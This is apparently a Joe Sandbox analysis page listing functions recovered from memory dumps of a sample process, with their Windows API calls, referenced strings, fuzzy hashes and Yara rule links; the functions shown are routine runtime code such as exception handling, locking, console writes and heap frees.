Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 899f712e1855a69f544eb14aeba4317f6d546397eb23c430ce65362ed1463b66
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: 1D518F3BA092CACBEB65CF1194A43687790EB66F85F144136DA8E47B86CF3CE451C708

Function 00007FFDA55D51D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFDA55D5237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFDA55D5283

Strings

MOC, xrefs: 00007FFDA55D524B
RCC, xrefs: 00007FFDA55D5253

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: 6e23d2491c4841db2ef1496b68de6208b9915dafb5dc6d4bb3821dfb8eb33236
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 34616D37A09BC9C2D662DF15E4503AAB7A0FB96B84F044225EB9D07B56CF7CD194CB04

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

kernel32.dll, xrefs: 000000014000EE26
InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFDA55DE3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFDA55DE473
WriteFile.KERNEL32 ref: 00007FFDA55DE73B
WriteFile.KERNEL32 ref: 00007FFDA55DE781
GetLastError.KERNEL32 ref: 00007FFDA55DE837

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: a71943fa3adb276ed681606c9d427581217ab47937f81055747349a9cd9d2d3b
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: 76D1E237B0AA89C9E712CF66D4502EC37B1FB45B98B404236DE5D97B9ADE38D406C344

Function 00007FFDA55DED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA55DED07), ref: 00007FFDA55DEE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFDA55DED07), ref: 00007FFDA55DEEC3

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 1450eba16023f496b0eba7cfd13f8fbf0852a50426b5d01d16c94242dca4c396
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 2291B327B1A69AC5F752DF6694603BC7BA0EB06F88F144139DE0E57786DE38E441C708

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFDA55D2218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDA55D2244
GetCurrentThreadId.KERNEL32 ref: 00007FFDA55D2252
GetCurrentProcessId.KERNEL32 ref: 00007FFDA55D225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFDA55D226E

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: 3896224dc6128b276527377ebf3740dada760b6f53602b0bce9bbc52b9bb0cd2
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 13114F26B15B058AEB01CF60E8553B833A4F719B58F440D35EE1D467A9EF78E164C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFDA55D5C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA55D5C2A

Strings

csm, xrefs: 00007FFDA55D5C4F
csm, xrefs: 00007FFDA55D5DBE

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: f2360160121cb5a1a767d68596db08afd136acb31848f97b0b863272da5de00b
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 8771B03B60A6C9CBD762DF25906077D7AA0EB16F85F048135DE8C07B9ACB2CD551C748

Function 00007FFDA55D6298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA55D6342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFDA55D636B

Strings

csm, xrefs: 00007FFDA55D646B

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: a71345d66c1b82a0c89ecf7ae7088b600bca1cae908f7bd84252af1b14614c95
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: A7513A3B61A785D6EA21EF15E05036E77A4FB8AB90F110139EB8D07B56CF38E461CB05

Function 00007FFDA55DEA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFDA55DEBA3
GetLastError.KERNEL32 ref: 00007FFDA55DEBC5

Strings

U, xrefs: 00007FFDA55DEB4F

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: 65b0b1dadbd3e3591d3a91530c139b82d64097d8014e07fce63ebbb546f2144b
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: 3241F637B1A68581EB21CF65E4543A97360FB85B84F404031EE4E83789DF3CE445CB44

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFDA55E0910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA55D3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA55D3A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFDA55E0993

Strings

f, xrefs: 00007FFDA55E0925
csm, xrefs: 00007FFDA55E092B

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: b989c581b8330bb01781cc8d3bbcfb8f938c9495e4303539368d29202081d513
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: B911DF27B197C9C5E711EF22E0512AD66A4EB46FC0F188035EE880BB56CE38D861CB08

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFDA55D3990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA55D112F), ref: 00007FFDA55D39E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA55D112F), ref: 00007FFDA55D3A21

Strings

csm, xrefs: 00007FFDA55D3A0E

Memory Dump Source

Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: 2166479aaec81c4753301b40fae82754635a466f824fbca70f92e842dc23aa28
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: 9D113737609B8582EB62CF15F41026977A5FB89B84F594230EE8D07B69DF3CD5528B04

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

